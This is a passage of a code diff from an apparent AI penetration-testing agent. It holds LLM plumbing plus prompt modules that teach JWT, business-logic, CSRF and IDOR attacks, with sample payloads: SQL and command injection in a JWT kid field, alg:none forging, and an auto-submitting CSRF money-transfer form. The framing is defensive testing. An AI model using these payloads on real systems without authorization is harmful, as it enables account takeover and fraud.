    ) -> str | list[dict[str, Any]]:
        if isinstance(content, str):
            return [{"type": "text", "text": content, "cache_control": {"type": "ephemeral"}}]
        if isinstance(content, list) and content:
            last_item = content[-1]
            if isinstance(last_item, dict) and last_item.get("type") == "text":
                return content[:-1] + [{**last_item, "cache_control": {"type": "ephemeral"}}]
        return content
    def _is_anthropic_model(self) -> bool:
        if not self.config.model_name:
            return False
        model_lower = self.config.model_name.lower()
        return any(provider in model_lower for provider in ["anthropic/", "claude"])
    def _calculate_cache_interval(self, total_messages: int) -> int:
        if total_messages <= 1:
            return 10
        max_cached_messages = 3
        non_system_messages = total_messages - 1
        interval = 10
        while non_system_messages // interval > max_cached_messages:
            interval += 10
        return interval
    def _prepare_cached_messages(self, messages: list[dict[str, Any]]) -> list[dict[str, Any]]:
        if (
            not self.config.enable_prompt_caching
            or not supports_prompt_caching(self.config.model_name)
            or not messages
        ):
            return messages
        if not self._is_anthropic_model():
            return messages
        cached_messages = list(messages)
        if cached_messages and cached_messages[0].get("role") == "system":
            system_message = cached_messages[0].copy()
            system_message["content"] = self._add_cache_control_to_content(
                system_message["content"]
            )
            cached_messages[0] = system_message
        total_messages = len(cached_messages)
        if total_messages > 1:
            interval = self._calculate_cache_interval(total_messages)
            cached_count = 0
            for i in range(interval, total_messages, interval):
                if cached_count >= 3:
                    break
                if i < len(cached_messages):
                    message = cached_messages[i].copy()
                    message["content"] = self._add_cache_control_to_content(message["content"])
                    cached_messages[i] = message
                    cached_count += 1
        return cached_messages
    async def generate(
        self,
        conversation_history: list[dict[str, Any]],
        scan_id: str | None = None,
        step_number: int = 1,
    ) -> LLMResponse:
        messages = [{"role": "system", "content": self.system_prompt}]
        compressed_history = list(self.memory_compressor.compress_history(conversation_history))
        conversation_history.clear()
        conversation_history.extend(compressed_history)
        messages.extend(compressed_history)
        cached_messages = self._prepare_cached_messages(messages)
        try:
            response = await self._make_request(cached_messages)
            self._update_usage_stats(response)
            content = ""
            if (
                response.choices
                and hasattr(response.choices[0], "message")
                and response.choices[0].message
            ):
                content = getattr(response.choices[0].message, "content", "") or ""
            content = _truncate_to_first_function(content)
            if "</function>" in content:
                function_end_index = content.find("</function>") + len("</function>")
                content = content[:function_end_index]
            tool_invocations = parse_tool_invocations(content)
            return LLMResponse(
                scan_id=scan_id,
                step_number=step_number,
                role=StepRole.AGENT,
                content=content,
                tool_invocations=tool_invocations if tool_invocations else None,
            )
        except (ValueError, TypeError, RuntimeError):
            logger.exception("Error in LLM generation")
            return LLMResponse(
                scan_id=scan_id,
                step_number=step_number,
                role=StepRole.AGENT,
                content="An error occurred while generating the response",
                tool_invocations=None,
            )
    @property
    def usage_stats(self) -> dict[str, dict[str, int | float]]:
        return {
            "total": self._total_stats.to_dict(),
            "last_request": self._last_request_stats.to_dict(),
        }
    def get_cache_config(self) -> dict[str, bool]:
        return {
            "enabled": self.config.enable_prompt_caching,
            "supported": supports_prompt_caching(self.config.model_name),
        }
    async def _make_request(
        self,
        messages: list[dict[str, Any]],
    ) -> ModelResponse:
        completion_args = {
            "model": self.config.model_name,
            "messages": messages,
            "temperature": self.config.temperature,
            "stop": ["</function>"],
        }
        queue = get_global_queue()
        response = await queue.make_request(completion_args)
        self._total_stats.requests += 1
        self._last_request_stats = RequestStats(requests=1)
        return response
    def _update_usage_stats(self, response: ModelResponse) -> None:
        try:
            if hasattr(response, "usage") and response.usage:
                input_tokens = getattr(response.usage, "prompt_tokens", 0)
                output_tokens = getattr(response.usage, "completion_tokens", 0)
                cached_tokens = 0
                cache_creation_tokens = 0
                if hasattr(response.usage, "prompt_tokens_details"):
                    prompt_details = response.usage.prompt_tokens_details
                    if hasattr(prompt_details, "cached_tokens"):
                        cached_tokens = prompt_details.cached_tokens or 0
                if hasattr(response.usage, "cache_creation_input_tokens"):
                    cache_creation_tokens = response.usage.cache_creation_input_tokens or 0
            else:
                input_tokens = 0
                output_tokens = 0
                cached_tokens = 0
                cache_creation_tokens = 0
            try:
                cost = completion_cost(response) or 0.0
            except (ValueError, TypeError, RuntimeError) as e:
                logger.warning(f"Failed to calculate cost: {e}")
                cost = 0.0
            self._total_stats.input_tokens += input_tokens
            self._total_stats.output_tokens += output_tokens
            self._total_stats.cached_tokens += cached_tokens
            self._total_stats.cache_creation_tokens += cache_creation_tokens
            self._total_stats.cost += cost
            self._last_request_stats.input_tokens = input_tokens
            self._last_request_stats.output_tokens = output_tokens
            self._last_request_stats.cached_tokens = cached_tokens
            self._last_request_stats.cache_creation_tokens = cache_creation_tokens
            self._last_request_stats.cost = cost
            if cached_tokens > 0:
                logger.info(f"Cache hit: {cached_tokens} cached tokens, {input_tokens} new tokens")
            if cache_creation_tokens > 0:
                logger.info(f"Cache creation: {cache_creation_tokens} tokens written to cache")
            logger.info(f"Usage stats: {self.usage_stats}")
        except (AttributeError, TypeError, ValueError) as e:
            logger.warning(f"Failed to update usage stats: {e}")
--- a/strix/llm/memory_compressor.py
+++ b/strix/llm/memory_compressor.py
@@ -0,0 +1,206 @@
 import logging
 import os
 from typing import Any
 import litellm
 logger = logging.getLogger(__name__)
 MAX_TOTAL_TOKENS = 100_000
 MIN_RECENT_MESSAGES = 15
 SUMMARY_PROMPT_TEMPLATE = """You are an agent performing context
 condensation for a security agent. Your job is to compress scan data while preserving
 ALL operationally critical information for continuing the security assessment.
 CRITICAL ELEMENTS TO PRESERVE:
 - Discovered vulnerabilities and potential attack vectors
 - Scan results and tool outputs (compressed but maintaining key findings)
 - Access credentials, tokens, or authentication details found
 - System architecture insights and potential weak points
 - Progress made in the assessment
 - Failed attempts and dead ends (to avoid duplication)
 - Any decisions made about the testing approach
 COMPRESSION GUIDELINES:
 - Preserve exact technical details (URLs, paths, parameters, payloads)
 - Summarize verbose tool outputs while keeping critical findings
 - Maintain version numbers, specific technologies identified
 - Keep exact error messages that might indicate vulnerabilities
 - Compress repetitive or similar findings into consolidated form
 Remember: Another security agent will use this summary to continue the assessment.
 They must be able to pick up exactly where you left off without losing any
 operational advantage or context needed to find vulnerabilities.
 CONVERSATION SEGMENT TO SUMMARIZE:
 {conversation}
 Provide a technically precise summary that preserves all operational security context while
 keeping the summary concise and to the point."""
 def _count_tokens(text: str, model: str) -> int:
    try:
        count = litellm.token_counter(model=model, text=text)
        return int(count)
    except Exception:
        logger.exception("Failed to count tokens")
        return len(text) // 4  # Rough estimate
 def _get_message_tokens(msg: dict[str, Any], model: str) -> int:
    content = msg.get("content", "")
    if isinstance(content, str):
        return _count_tokens(content, model)
    if isinstance(content, list):
        return sum(
            _count_tokens(item.get("text", ""), model)
            for item in content
            if isinstance(item, dict) and item.get("type") == "text"
        )
    return 0
 def _extract_message_text(msg: dict[str, Any]) -> str:
    content = msg.get("content", "")
    if isinstance(content, str):
        return content
    if isinstance(content, list):
        parts = []
        for item in content:
            if isinstance(item, dict):
                if item.get("type") == "text":
                    parts.append(item.get("text", ""))
                elif item.get("type") == "image_url":
                    parts.append("[IMAGE]")
        return " ".join(parts)
    return str(content)
 def _summarize_messages(
    messages: list[dict[str, Any]],
    model: str,
 ) -> dict[str, Any]:
    if not messages:
        empty_summary = "<context_summary message_count='0'>{text}</context_summary>"
        return {
            "role": "assistant",
            "content": empty_summary.format(text="No messages to summarize"),
        }
    formatted = []
    for msg in messages:
        role = msg.get("role", "unknown")
        text = _extract_message_text(msg)
        formatted.append(f"{role}: {text}")
    conversation = "\n".join(formatted)
    prompt = SUMMARY_PROMPT_TEMPLATE.format(conversation=conversation)
    try:
        completion_args = {
            "model": model,
            "messages": [{"role": "user", "content": prompt}],
        }
        response = litellm.completion(**completion_args)
        summary = response.choices[0].message.content
        summary_msg = "<context_summary message_count='{count}'>{text}</context_summary>"
        return {
            "role": "assistant",
            "content": summary_msg.format(count=len(messages), text=summary),
        }
    except Exception:
        logger.exception("Failed to summarize messages")
        return messages[0]
 def _handle_images(messages: list[dict[str, Any]], max_images: int) -> None:
    image_count = 0
    for msg in reversed(messages):
        content = msg.get("content", [])
        if isinstance(content, list):
            for item in content:
                if isinstance(item, dict) and item.get("type") == "image_url":
                    if image_count >= max_images:
                        item.update(
                            {
                                "type": "text",
                                "text": "[Previously attached image removed to preserve context]",
                            }
                        )
                    else:
                        image_count += 1
 class MemoryCompressor:
    def __init__(
        self,
        max_images: int = 3,
        model_name: str | None = None,
    ):
        self.max_images = max_images
        self.model_name = model_name or os.getenv("STRIX_LLM", "anthropic/claude-sonnet-4-20250514")
        if not self.model_name:
            raise ValueError("STRIX_LLM environment variable must be set and not empty")
    def compress_history(
        self,
        messages: list[dict[str, Any]],
    ) -> list[dict[str, Any]]:
        """Compress conversation history to stay within token limits.
        Strategy:
        1. Handle image limits first
        2. Keep all system messages
        3. Keep minimum recent messages
        4. Summarize older messages when total tokens exceed limit
        The compression preserves:
        - All system messages unchanged
        - Most recent messages intact
        - Critical security context in summaries
        - Recent images for visual context
        - Technical details and findings
        """
        if not messages:
            return messages
        _handle_images(messages, self.max_images)
        system_msgs = []
        regular_msgs = []
        for msg in messages:
            if msg.get("role") == "system":
                system_msgs.append(msg)
            else:
                regular_msgs.append(msg)
        recent_msgs = regular_msgs[-MIN_RECENT_MESSAGES:]
        old_msgs = regular_msgs[:-MIN_RECENT_MESSAGES]
        # Type assertion since we ensure model_name is not None in __init__
        model_name: str = self.model_name  # type: ignore[assignment]
        total_tokens = sum(
            _get_message_tokens(msg, model_name) for msg in system_msgs + regular_msgs
        )
        if total_tokens <= MAX_TOTAL_TOKENS * 0.9:
            return messages
        compressed = []
        chunk_size = 10
        for i in range(0, len(old_msgs), chunk_size):
            chunk = old_msgs[i : i + chunk_size]
            summary = _summarize_messages(chunk, model_name)
            if summary:
                compressed.append(summary)
        return system_msgs + compressed + recent_msgs
--- a/strix/llm/request_queue.py
+++ b/strix/llm/request_queue.py
@@ -0,0 +1,63 @@
 import asyncio
 import logging
 import threading
 import time
 from typing import Any
 from litellm import ModelResponse, completion
 from tenacity import retry, stop_after_attempt, wait_exponential
 logger = logging.getLogger(__name__)
 class LLMRequestQueue:
    def __init__(self, max_concurrent: int = 6, delay_between_requests: float = 1.0):
        self.max_concurrent = max_concurrent
        self.delay_between_requests = delay_between_requests
        self._semaphore = threading.BoundedSemaphore(max_concurrent)
        self._last_request_time = 0.0
        self._lock = threading.Lock()
    async def make_request(self, completion_args: dict[str, Any]) -> ModelResponse:
        try:
            while not self._semaphore.acquire(timeout=0.2):
                await asyncio.sleep(0.1)
            with self._lock:
                now = time.time()
                time_since_last = now - self._last_request_time
                sleep_needed = max(0, self.delay_between_requests - time_since_last)
                self._last_request_time = now + sleep_needed
            if sleep_needed > 0:
                await asyncio.sleep(sleep_needed)
            return await self._reliable_request(completion_args)
        finally:
            self._semaphore.release()
    @retry(  # type: ignore[misc]
        stop=stop_after_attempt(15),
        wait=wait_exponential(multiplier=1.2, min=1, max=300),
        reraise=True,
    )
    async def _reliable_request(self, completion_args: dict[str, Any]) -> ModelResponse:
        response = completion(**completion_args, stream=False)
        if isinstance(response, ModelResponse):
            return response
        self._raise_unexpected_response()
        raise RuntimeError("Unreachable code")
    def _raise_unexpected_response(self) -> None:
        raise RuntimeError("Unexpected response type")
 _global_queue: LLMRequestQueue | None = None
 def get_global_queue() -> LLMRequestQueue:
    global _global_queue  # noqa: PLW0603
    if _global_queue is None:
        _global_queue = LLMRequestQueue()
    return _global_queue
--- a/strix/llm/utils.py
+++ b/strix/llm/utils.py
@@ -0,0 +1,84 @@
 import re
 from typing import Any
 def _truncate_to_first_function(content: str) -> str:
    if not content:
        return content
    function_starts = [match.start() for match in re.finditer(r"<function=", content)]
    if len(function_starts) >= 2:
        second_function_start = function_starts[1]
        return content[:second_function_start].rstrip()
    return content
 def parse_tool_invocations(content: str) -> list[dict[str, Any]] | None:
    content = _fix_stopword(content)
    tool_invocations: list[dict[str, Any]] = []
    fn_regex_pattern = r"<function=([^>]+)>\n?(.*?)</function>"
    fn_param_regex_pattern = r"<parameter=([^>]+)>(.*?)</parameter>"
    fn_matches = re.finditer(fn_regex_pattern, content, re.DOTALL)
    for fn_match in fn_matches:
        fn_name = fn_match.group(1)
        fn_body = fn_match.group(2)
        param_matches = re.finditer(fn_param_regex_pattern, fn_body, re.DOTALL)
        args = {}
        for param_match in param_matches:
            param_name = param_match.group(1)
            param_value = param_match.group(2).strip()
            args[param_name] = param_value
        tool_invocations.append({"toolName": fn_name, "args": args})
    return tool_invocations if tool_invocations else None
 def _fix_stopword(content: str) -> str:
    if "<function=" in content and content.count("<function=") == 1:
        if content.endswith("</"):
            content = content.rstrip() + "function>"
        elif not content.rstrip().endswith("</function>"):
            content = content + "\n</function>"
    return content
 def format_tool_call(tool_name: str, args: dict[str, Any]) -> str:
    xml_parts = [f"<function={tool_name}>"]
    for key, value in args.items():
        xml_parts.append(f"<parameter={key}>{value}</parameter>")
    xml_parts.append("</function>")
    return "\n".join(xml_parts)
 def clean_content(content: str) -> str:
    if not content:
        return ""
    content = _fix_stopword(content)
    tool_pattern = r"<function=[^>]+>.*?</function>"
    cleaned = re.sub(tool_pattern, "", content, flags=re.DOTALL)
    hidden_xml_patterns = [
        r"<inter_agent_message>.*?</inter_agent_message>",
        r"<agent_completion_report>.*?</agent_completion_report>",
    ]
    for pattern in hidden_xml_patterns:
        cleaned = re.sub(pattern, "", cleaned, flags=re.DOTALL | re.IGNORECASE)
    cleaned = re.sub(r"\n\s*\n", "\n\n", cleaned)
    return cleaned.strip()
--- a/strix/prompts/init.py
+++ b/strix/prompts/init.py
@@ -0,0 +1,113 @@
 from pathlib import Path
 from jinja2 import Environment
 def get_available_prompt_modules() -> dict[str, list[str]]:
    modules_dir = Path(__file__).parent
    available_modules = {}
    for category_dir in modules_dir.iterdir():
        if category_dir.is_dir() and not category_dir.name.startswith("__"):
            category_name = category_dir.name
            modules = []
            for file_path in category_dir.glob("*.jinja"):
                module_name = file_path.stem
                modules.append(module_name)
            if modules:
                available_modules[category_name] = sorted(modules)
    return available_modules
 def get_all_module_names() -> set[str]:
    all_modules = set()
    for category_modules in get_available_prompt_modules().values():
        all_modules.update(category_modules)
    return all_modules
 def validate_module_names(module_names: list[str]) -> dict[str, list[str]]:
    available_modules = get_all_module_names()
    valid_modules = []
    invalid_modules = []
    for module_name in module_names:
        if module_name in available_modules:
            valid_modules.append(module_name)
        else:
            invalid_modules.append(module_name)
    return {"valid": valid_modules, "invalid": invalid_modules}
 def generate_modules_description() -> str:
    available_modules = get_available_prompt_modules()
    if not available_modules:
        return "No prompt modules available"
    description_parts = []
    for category, modules in available_modules.items():
        modules_str = ", ".join(modules)
        description_parts.append(f"{category} ({modules_str})")
    description = (
        f"List of prompt modules to load for this agent (max 3). "
        f"Available modules: {', '.join(description_parts)}. "
    )
    example_modules = []
    for modules in available_modules.values():
        example_modules.extend(modules[:2])
        if len(example_modules) >= 2:
            break
    if example_modules:
        example = f"Example: {example_modules[:2]} for specialized agent"
        description += example
    return description
 def load_prompt_modules(module_names: list[str], jinja_env: Environment) -> dict[str, str]:
    import logging
    logger = logging.getLogger(__name__)
    module_content = {}
    prompts_dir = Path(__file__).parent
    available_modules = get_available_prompt_modules()
    for module_name in module_names:
        try:
            module_path = None
            if "/" in module_name:
                module_path = f"{module_name}.jinja"
            else:
                for category, modules in available_modules.items():
                    if module_name in modules:
                        module_path = f"{category}/{module_name}.jinja"
                        break
                if not module_path:
                    root_candidate = f"{module_name}.jinja"
                    if (prompts_dir / root_candidate).exists():
                        module_path = root_candidate
            if module_path and (prompts_dir / module_path).exists():
                template = jinja_env.get_template(module_path)
                var_name = module_name.split("/")[-1]
                module_content[var_name] = template.render()
                logger.info(f"Loaded prompt module: {module_name} -> {var_name}")
            else:
                logger.warning(f"Prompt module not found: {module_name}")
        except (FileNotFoundError, OSError, ValueError) as e:
            logger.warning(f"Failed to load prompt module {module_name}: {e}")
    return module_content
--- a/strix/prompts/coordination/root_agent.jinja
+++ b/strix/prompts/coordination/root_agent.jinja
@@ -0,0 +1,41 @@
 <coordination_role>
 You are a COORDINATION AGENT ONLY. You do NOT perform any security testing, vulnerability assessment, or technical work yourself.
 Your ONLY responsibilities:
 1. Create specialized agents for specific security tasks
 2. Monitor agent progress and coordinate between them
 3. Compile final scan reports from agent findings
 4. Manage agent communication and dependencies
 CRITICAL RESTRICTIONS:
 - NEVER perform vulnerability testing or security assessments
 - NEVER write detailed vulnerability reports (only compile final summaries)
 - ONLY use agent_graph and finish tools for coordination
 - You can create agents throughout the scan process, depending on the task and findings, not just at the beginning!
 </coordination_role>
 <agent_management>
 BEFORE CREATING AGENTS:
 1. Analyze the target scope and break into independent tasks
 2. Check existing agents to avoid duplication
 3. Create agents with clear, specific objectives to avoid duplication
 AGENT TYPES YOU CAN CREATE:
 - Reconnaissance: subdomain enum, port scanning, tech identification, etc.
 - Vulnerability Testing: SQL injection, XSS, auth bypass, IDOR, RCE, SSRF, etc. Can be black-box or white-box.
    - Direct vulnerability testing agents to implement hierarchical workflow (per finding: discover, verify, report, fix): each one should create validation agents for findings verification, which spawn reporting agents for documentation, which create fix agents for remediation
 COORDINATION GUIDELINES:
 - Ensure clear task boundaries and success criteria
 - Terminate redundant agents when objectives overlap
 - Use message passing for agent communication
 </agent_management>
 <final_responsibilities>
 When all agents complete:
 1. Collect findings from all agents
 2. Compile a final scan summary report
 3. Use finish tool to complete the assessment
 Your value is in orchestration, not execution.
 </final_responsibilities>
--- a/strix/prompts/vulnerabilities/authentication_jwt.jinja
+++ b/strix/prompts/vulnerabilities/authentication_jwt.jinja
@@ -0,0 +1,129 @@
 <authentication_jwt_guide>
 <title>AUTHENTICATION & JWT VULNERABILITIES</title>
 <critical>Authentication flaws lead to complete account takeover. JWT misconfigurations are everywhere.</critical>
 <jwt_structure>
 header.payload.signature
 - Header: {"alg":"HS256","typ":"JWT"}
 - Payload: {"sub":"1234","name":"John","iat":1516239022}
 - Signature: HMACSHA256(base64UrlEncode(header) + "." + base64UrlEncode(payload), secret)
 </jwt_structure>
 <common_attacks>
 <algorithm_confusion>
 RS256 to HS256:
 - Change RS256 to HS256 in header
 - Use public key as HMAC secret
 - Sign token with public key (often in /jwks.json or /.well-known/)
 </algorithm_confusion>
 <none_algorithm>
 - Set "alg": "none" in header
 - Remove signature completely (keep the trailing dot)
 </none_algorithm>
 <weak_secrets>
 Common secrets: 'secret', 'password', '123456', 'key', 'jwt_secret', 'your-256-bit-secret'
 </weak_secrets>
 <kid_manipulation>
 - SQL Injection: "kid": "key' UNION SELECT 'secret'--"
 - Command injection: "kid": "|sleep 10"
 - Path traversal: "kid": "../../../../../../dev/null"
 </kid_manipulation>
 </common_attacks>
 <advanced_techniques>
 <jwk_injection>
 Embed public key in token header:
 {"jwk": {"kty": "RSA", "n": "your-public-key-n", "e": "AQAB"}}
 </jwk_injection>
 <jku_manipulation>
 Set jku/x5u to attacker-controlled URL hosting malicious JWKS
 </jku_manipulation>
 <timing_attacks>
 Extract signature byte-by-byte using verification timing differences
 </timing_attacks>
 </advanced_techniques>
 <oauth_vulnerabilities>
 <authorization_code_theft>
 - Exploit redirect_uri with open redirects, subdomain takeover, parameter pollution
 - Missing/predictable state parameter = CSRF
 - PKCE downgrade: remove code_challenge parameter
 </authorization_code_theft>
 </oauth_vulnerabilities>
 <saml_attacks>
 - Signature exclusion: remove signature element
 - Signature wrapping: inject assertions
 - XXE in SAML responses
 </saml_attacks>
 <session_attacks>
 - Session fixation: force known session ID
 - Session puzzling: mix different session objects
 - Race conditions in session generation
 </session_attacks>
 <password_reset_flaws>
 - Predictable tokens: MD5(timestamp), sequential numbers
 - Host header injection for reset link poisoning
 - Race condition resets
 </password_reset_flaws>
 <mfa_bypass>
 - Response manipulation: change success:false to true
 - Status code manipulation: 403 to 200
 - Brute force with no rate limiting
 - Backup code abuse
 </mfa_bypass>
 <advanced_bypasses>
 <unicode_normalization>
 Different representations: admin@exａmple.com (fullwidth), аdmin@example.com (Cyrillic)
 </unicode_normalization>
 <authentication_chaining>
 - JWT + SQLi: kid parameter with SQL injection
 - OAuth + XSS: steal tokens via XSS
 - SAML + XXE + SSRF: chain for internal access
 </authentication_chaining>
 </advanced_bypasses>
 <tools>
 - jwt_tool: Comprehensive JWT testing
 - Check endpoints: /login, /oauth/authorize, /saml/login, /.well-known/openid-configuration, /jwks.json
 </tools>
 <validation>
 To confirm authentication flaw:
 1. Demonstrate account access without credentials
 2. Show privilege escalation
 3. Prove token forgery works
 4. Bypass authentication/2FA requirements
 5. Maintain persistent access
 </validation>
 <false_positives>
 NOT a vulnerability if:
 - Requires valid credentials
 - Only affects own session
 - Proper signature validation
 - Token expiration enforced
 - Rate limiting prevents brute force
 </false_positives>
 <impact>
 - Account takeover: access other users' accounts
 - Privilege escalation: user to admin
 - Token forgery: create valid tokens
 - Bypass mechanisms: skip auth/2FA
 - Persistent access: survives logout
 </impact>
 <remember>Focus on RS256->HS256, weak secrets, and none algorithm first. Modern apps use multiple auth methods simultaneously - find gaps in integration.</remember>
 </authentication_jwt_guide>
--- a/strix/prompts/vulnerabilities/business_logic.jinja
+++ b/strix/prompts/vulnerabilities/business_logic.jinja
@@ -0,0 +1,143 @@
 <business_logic_flaws_guide>
 <title>BUSINESS LOGIC FLAWS - OUTSMARTING THE APPLICATION</title>
 <critical>Business logic flaws bypass all technical security controls by exploiting flawed assumptions in application workflow. Often the highest-paying vulnerabilities.</critical>
 <discovery_techniques>
 - Map complete user journeys and state transitions
 - Document developer assumptions
 - Find edge cases in workflows
 - Look for missing validation steps
 - Identify trust boundaries
 </discovery_techniques>
 <high_value_targets>
 <financial_workflows>
 - Price manipulation (negative quantities, decimal truncation)
 - Currency conversion abuse (buy weak, refund strong)
 - Discount/coupon stacking
 - Payment method switching after verification
 - Cart manipulation during checkout
 </financial_workflows>
 <account_management>
 - Registration race conditions (same email/username)
 - Account type elevation
 - Trial period extension
 - Subscription downgrade with feature retention
 </account_management>
 <authorization_flaws>
 - Function-level bypass (accessing admin functions as user)
 - Object reference manipulation
 - Permission inheritance bugs
 - Multi-tenancy isolation failures
 </authorization_flaws>
 </high_value_targets>
 <exploitation_techniques>
 <race_conditions>
 Use race conditions to:
 - Double-spend vouchers/credits
 - Bypass rate limits
 - Create duplicate accounts
 - Exploit TOCTOU vulnerabilities
 </race_conditions>
 <state_manipulation>
 - Skip workflow steps
 - Replay previous states
 - Force invalid state transitions
 - Manipulate hidden parameters
 </state_manipulation>
 <input_manipulation>
 - Type confusion: string where int expected
 - Boundary values: 0, -1, MAX_INT
 - Format abuse: scientific notation, Unicode
 - Encoding tricks: double encoding, mixed encoding
 </input_manipulation>
 </exploitation_techniques>
 <common_flaws>
 <shopping_cart>
 - Add items with negative price
 - Modify prices client-side
 - Apply expired coupons
 - Stack incompatible discounts
 - Change currency after price lock
 </shopping_cart>
 <payment_processing>
 - Complete order before payment
 - Partial payment acceptance
 - Payment replay attacks
 - Void after delivery
 - Refund more than paid
 </payment_processing>
 <user_lifecycle>
 - Premium features in trial
 - Account deletion bypasses
 - Privilege retention after demotion
 - Transfer restrictions bypass
 </user_lifecycle>
 </common_flaws>
 <advanced_techniques>
 <business_constraint_violations>
 - Exceed account limits
 - Bypass geographic restrictions
 - Violate temporal constraints
 - Break dependency chains
 </business_constraint_violations>
 <workflow_abuse>
 - Parallel execution of exclusive processes
 - Recursive operations (infinite loops)
 - Asynchronous timing exploitation
 - Callback manipulation
 </workflow_abuse>
 </advanced_techniques>
 <validation>
 To confirm business logic flaw:
 1. Demonstrate financial impact
 2. Show consistent reproduction
 3. Prove bypass of intended restrictions
 4. Document assumption violation
 5. Quantify potential damage
 </validation>
 <false_positives>
 NOT a business logic flaw if:
 - Requires technical vulnerability (SQLi, XSS)
 - Working as designed (bad design ≠ vulnerability)
 - Only affects display/UI
 - No security impact
 - Requires privileged access
 </false_positives>
 <impact>
 - Financial loss (direct monetary impact)
 - Unauthorized access to features/data
 - Service disruption
 - Compliance violations
 - Reputation damage
 </impact>
 <pro_tips>
 1. Think like a malicious user, not a developer
 2. Question every assumption
 3. Test boundary conditions obsessively
 4. Combine multiple small issues
 5. Focus on money flows
 6. Check state machines thoroughly
 7. Abuse features, don't break them
 8. Document business impact clearly
 9. Test integration points
 10. Time is often a factor - exploit it
 </pro_tips>
 <remember>Business logic flaws are about understanding and exploiting the application's rules, not breaking them with technical attacks. The best findings come from deep understanding of the business domain.</remember>
 </business_logic_flaws_guide>
--- a/strix/prompts/vulnerabilities/csrf.jinja
+++ b/strix/prompts/vulnerabilities/csrf.jinja
@@ -0,0 +1,168 @@
 <csrf_vulnerability_guide>
 <title>CROSS-SITE REQUEST FORGERY (CSRF) - ADVANCED EXPLOITATION</title>
 <critical>CSRF forces authenticated users to execute unwanted actions, exploiting the trust a site has in the user's browser.</critical>
 <high_value_targets>
 - Password/email change forms
 - Money transfer/payment functions
 - Account deletion/deactivation
 - Permission/role changes
 - API key generation/regeneration
 - OAuth connection/disconnection
 - 2FA enable/disable
 - Privacy settings modification
 - Admin functions
 - File uploads/deletions
 </high_value_targets>
 <discovery_techniques>
 <token_analysis>
 Common token names: csrf_token, csrftoken, _csrf, authenticity_token, __RequestVerificationToken, X-CSRF-TOKEN
 Check if tokens are:
 - Actually validated (remove and test)
 - Tied to user session
 - Reusable across requests
 - Present in GET requests
 - Predictable or static
 </token_analysis>
 <http_methods>
 - Test if POST endpoints accept GET
 - Try method override headers: _method, X-HTTP-Method-Override
 - Check if PUT/DELETE lack protection
 </http_methods>
 </discovery_techniques>
 <exploitation_techniques>
 <basic_forms>
 HTML form auto-submit:
 <form action="https://target.com/transfer" method="POST">
  <input name="amount" value="1000">
  <input name="to" value="attacker">
 </form>
 <script>document.forms[0].submit()</script>
 </basic_forms>
 <json_csrf>
 For JSON endpoints:
 <form enctype="text/plain" action="https://target.com/api">
  <input name='{"amount":1000,"to":"attacker","ignore":"' value='"}'>
 </form>
 </json_csrf>
 <multipart_csrf>
 For file uploads:
 Use XMLHttpRequest with credentials
 Generate multipart/form-data boundaries
 </multipart_csrf>
 </exploitation_techniques>
 <bypass_techniques>
 <token_bypasses>
 - Null token: remove parameter entirely
 - Empty token: csrf_token=
 - Token from own account: use your valid token
 - Token fixation: force known token value
 - Method interchange: GET token used for POST
 </token_bypasses>
 <header_bypasses>
 - Referer bypass: use data: URI, about:blank
 - Origin bypass: null origin via sandboxed iframe
 - CORS misconfigurations
 </header_bypasses>
 <content_type_tricks>
 - Change multipart to application/x-www-form-urlencoded
 - Use text/plain for JSON endpoints
 - Exploit parsers that accept multiple formats
 </content_type_tricks>
 </bypass_techniques>
 <advanced_techniques>
 <subdomain_csrf>
 - XSS on subdomain = CSRF on main domain
 - Cookie scope abuse (domain=.example.com)
 - Subdomain takeover for CSRF
 </subdomain_csrf>
 <csrf_login>
 - Force victim to login as attacker
 - Plant backdoors in victim's account
 - Access victim's future data
 </csrf_login>
 <csrf_logout>
 - Force logout → login CSRF → account takeover
 </csrf_logout>
 <double_submit_csrf>
 If using double-submit cookies:
 - Set cookie via XSS/subdomain
 - Cookie injection via header injection
 - Cookie tossing attacks
 </double_submit_csrf>
 </advanced_techniques>
 <special_contexts>
 <websocket_csrf>
 - Cross-origin WebSocket hijacking
 - Steal tokens from WebSocket messages
 </websocket_csrf>
 <graphql_csrf>
 - GET requests with query parameter
 - Batched mutations
 - Subscription abuse
 </graphql_csrf>
 <api_csrf>
 - Bearer tokens in URL parameters
 - API keys in GET requests
 - Insecure CORS policies
 </api_csrf>
 </special_contexts>
 <validation>
 To confirm CSRF:
 1. Create working proof-of-concept
 2. Test across browsers
 3. Verify action completes successfully
 4. No user interaction required (beyond visiting page)
 5. Works with active session
 </validation>
 <false_positives>
 NOT CSRF if:
 - Requires valid CSRF token
 - SameSite cookies properly configured
 - Proper origin/referer validation
 - User interaction required
 - Only affects non-sensitive actions
 </false_positives>
 <impact>
 - Account takeover
 - Financial loss
 - Data modification/deletion
 - Privilege escalation
 - Privacy violations
 </impact>
 <pro_tips>
 1. Check all state-changing operations
 2. Test file upload endpoints
 3. Look for token disclosure in URLs
 4. Chain with XSS for token theft
 5. Check mobile API endpoints
 6. Test CORS configurations
 7. Verify SameSite cookie settings
 8. Look for method override possibilities
 9. Test WebSocket endpoints
 10. Document clear attack scenario
 </pro_tips>
 <remember>Modern CSRF requires creativity - look for token leaks, chain with other vulnerabilities, and focus on high-impact actions. SameSite cookies are not always properly configured.</remember>
 </csrf_vulnerability_guide>
--- a/strix/prompts/vulnerabilities/idor.jinja
+++ b/strix/prompts/vulnerabilities/idor.jinja
@@ -0,0 +1,164 @@
 <idor_vulnerability_guide>
 <title>INSECURE DIRECT OBJECT REFERENCE (IDOR) - ELITE TECHNIQUES</title>
 <critical>IDORs are among the HIGHEST IMPACT vulnerabilities - direct unauthorized data access and account takeover.</critical>
 <discovery_techniques>
 <parameter_analysis>
 - Numeric IDs: user_id=123, account=456
 - UUID/GUID patterns: id=550e8400-e29b-41d4-a716-446655440000
 - Encoded IDs: Base64, hex, custom encoding
 - Composite IDs: user-org-123-456, ACCT:2024:00123
 - Hash-based IDs: Check if predictable (MD5 of sequential numbers)
 - Object references in: URLs, POST bodies, headers, cookies, JWT tokens
 </parameter_analysis>
 <advanced_enumeration>
 - Boundary values: 0, -1, null, empty string, max int
 - Different formats: {"id":123} vs {"id":"123"}
 - ID patterns: increment, decrement, similar patterns
 - Wildcard testing: *, %, _, all
 - Array notation: id[]=123&id[]=456
 </advanced_enumeration>
 </discovery_techniques>
 <high_value_targets>
 - User profiles and PII
 - Financial records/transactions
 - Private messages/communications
 - Medical records
 - API keys/secrets
 - Internal documents
 - Admin functions
 - Export endpoints
 - Backup files
 - Debug information
 </high_value_targets>
 <exploitation_techniques>
 <direct_access>
